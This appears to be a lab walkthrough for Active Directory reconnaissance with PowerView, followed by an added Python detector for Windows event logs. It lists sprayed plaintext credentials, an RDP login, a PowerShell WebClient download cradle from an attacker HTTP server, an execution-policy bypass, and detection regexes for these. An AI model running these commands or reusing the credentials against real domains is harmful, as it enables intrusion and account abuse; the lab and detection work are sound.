Setting Up PowerView

PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various Windows "net *" commands, which utilize PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality.

We have the following credentials. Spraying them and trying to authenticate to the different servers and services shows that elena.lopez has RDP access to 192.168.56.22.

miguel.cabrera = ilovebaseball
claudio.ortiz = babyboy
pacofish = pacofish
elena.lopez = princesa1

Installing xFreeRDP

sudo apt-get install aptitude
sudo aptitude install freerdp2-x11

From there, aptitude may prompt you and tell you the dependencies are out of date. If it does, choose no (n) for the first proposed solution. For the second one to pop up, I selected yes (y) to downgrade the dependencies to the correct version.

sudo aptitude install freerdp2-x11
The following NEW packages will be installed:
  freerdp2-x11{b} 
0 packages upgraded, 1 newly installed, 0 to remove and 228 not upgraded.
Need to get 104 kB of archives. After unpacking 837 kB will be used.
The following packages have unmet dependencies:
 freerdp2-x11 : Depends: libfreerdp-client2-2 (= 2.3.0+dfsg1-2+deb11u1) but 2.9.0+dfsg1-1~bpo11+1 is installed
The following actions will resolve these dependencies:

     Keep the following packages at their current version:
1)     freerdp2-x11 [Not Installed]                       



Accept this solution? [Y/n/q/?] n
The following actions will resolve these dependencies:

     Downgrade the following packages:                                                                       
1)     libfreerdp-client2-2 [2.9.0+dfsg1-1~bpo11+1 (now, parrot-backports) -> 2.3.0+dfsg1-2+deb11u1 (parrot)]
2)     libfreerdp2-2 [2.9.0+dfsg1-1~bpo11+1 (now, parrot-backports) -> 2.3.0+dfsg1-2+deb11u1 (parrot)]       
3)     libwinpr2-2 [2.9.0+dfsg1-1~bpo11+1 (now, parrot-backports) -> 2.3.0+dfsg1-2+deb11u1 (parrot)]         



Accept this solution? [Y/n/q/?] y
The following packages will be DOWNGRADED:
  libfreerdp-client2-2 libfreerdp2-2 libwinpr2-2 
The following NEW packages will be installed:
  freerdp2-x11 
0 packages upgraded, 1 newly installed, 3 downgraded, 0 to remove and 228 not upgraded.
Need to get 1,241 kB of archives. After unpacking 729 kB will be used.
Do you want to continue? [Y/n/?] y

RDP to Yonkers (192.168.56.22)

xfreerdp /d:north.newyork.local /u:elena.lopez /p:'princesa1' /v:192.168.56.22 /size:80%  /cert-ignore

Downloading PowerView.ps1 to ParrotOS Lab Machine

wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1

Set Up HTTP Server From ParrotOS Lab Machine

python3 -m http.server

Downloading PowerView From ParrotOS Lab Machine

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.31:8000/PowerView.ps1', 'C:\Users\Elena.Lopez\Documents\PowerView.ps1')

PowerView Intro

Powershell -ep bypass
Import-Module .\PowerView.ps1
Get-NetUser
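
The commands above leave traces a defender can match. The following added example (not part of the original walkthrough or of PowerView) checks process-creation command lines (Event ID 4688) and PowerShell script block logs (Event ID 4104) for them. The rule names, the constructed sample records and the DownloadString variant are assumptions made for illustration.

```python
import re

# Any flag followed by the value "bypass"; the flag name is validated separately.
EP_FLAG = re.compile(r"(?i)(?:^|\s)[-/]([a-z]+)\s+bypass\b")
# WebClient download call, capturing the source URL (DownloadString is an added generalization).
CRADLE = re.compile(
    r"(?i)Net\.WebClient\)?\s*\.\s*Download(?:File|String)\(\s*['\"]([^'\"]+)['\"]")
# Script file name and the one PowerView function used on this page.
POWERVIEW = re.compile(r"(?i)\bPowerView\.ps1\b|\bGet-NetUser\b")

# Constructed sample records: (event_id, logged text).
SAMPLE = [
    (4688, r"powershell.exe (New-Object System.Net.WebClient).DownloadFile("
           r"'http://192.168.56.31:8000/PowerView.ps1', "
           r"'C:\Users\Elena.Lopez\Documents\PowerView.ps1')"),
    (4688, "Powershell -ep bypass"),
    (4104, r"Import-Module .\PowerView.ps1"),
    (4104, "Get-NetUser"),
    (4688, "powershell.exe -ExecutionPolicy Restricted -File backup.ps1"),
    (4104, r"Get-ChildItem C:\Users"),
]

def is_policy_bypass(text):
    """True when -ExecutionPolicy, its -ep alias or a prefix such as -exec is set to Bypass."""
    for flag in EP_FLAG.findall(text):
        flag = flag.lower()
        # A bare -e is -EncodedCommand, so require at least "ex".
        if flag == "ep" or (len(flag) >= 2 and "executionpolicy".startswith(flag)):
            return True
    return False

def classify(text):
    """Return the names of the rules that match one logged command or script block."""
    hits = []
    if is_policy_bypass(text):
        hits.append("execution_policy_bypass")
    match = CRADLE.search(text)
    if match:
        hits.append("webclient_download:" + match.group(1))
    if POWERVIEW.search(text):
        hits.append("powerview_reference")
    return hits

def triage(events):
    """Keep only the records that matched, paired with their rule hits."""
    return [(eid, hits) for eid, text in events if (hits := classify(text))]

if __name__ == "__main__":
    for event_id, hits in triage(SAMPLE):
        print(event_id, hits)
```

The 4104 matches only appear when script block logging is enabled on the host, and the 4688 matches only when command-line auditing is included in process-creation events.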
